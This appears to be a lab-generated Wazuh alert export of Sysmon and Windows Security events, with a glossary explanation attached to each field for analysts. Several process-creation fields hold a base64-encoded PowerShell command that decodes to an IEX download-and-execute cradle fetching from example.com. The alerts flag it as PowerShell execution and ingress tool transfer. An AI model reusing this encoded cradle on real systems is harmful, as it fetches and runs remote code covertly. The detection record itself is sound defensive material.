data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 77 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534317.1661603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:35.0202773Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284690 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:34.972
ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ProcessId: 7408
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_duu0a5qz.2gs.ps1
CreationUtcTime: 2025-04-24 22:38:34.972
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:34.972 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_duu0a5qz.2gs.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:34.972 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534319.1664368 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:36.4053980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43871 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534319.1671705 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:36.5651451Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43873 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 74 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534320.1679042 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:38.2272668Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284720 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:36.142
ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ProcessId: 14508
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00}
ParentProcessId: 7408
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:36.142 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14508 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 7408 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 78 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534320.1687109 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:38.4764370Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284721 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:38.465
ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00}
ProcessId: 14508
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1
CreationUtcTime: 2025-04-24 22:38:38.465
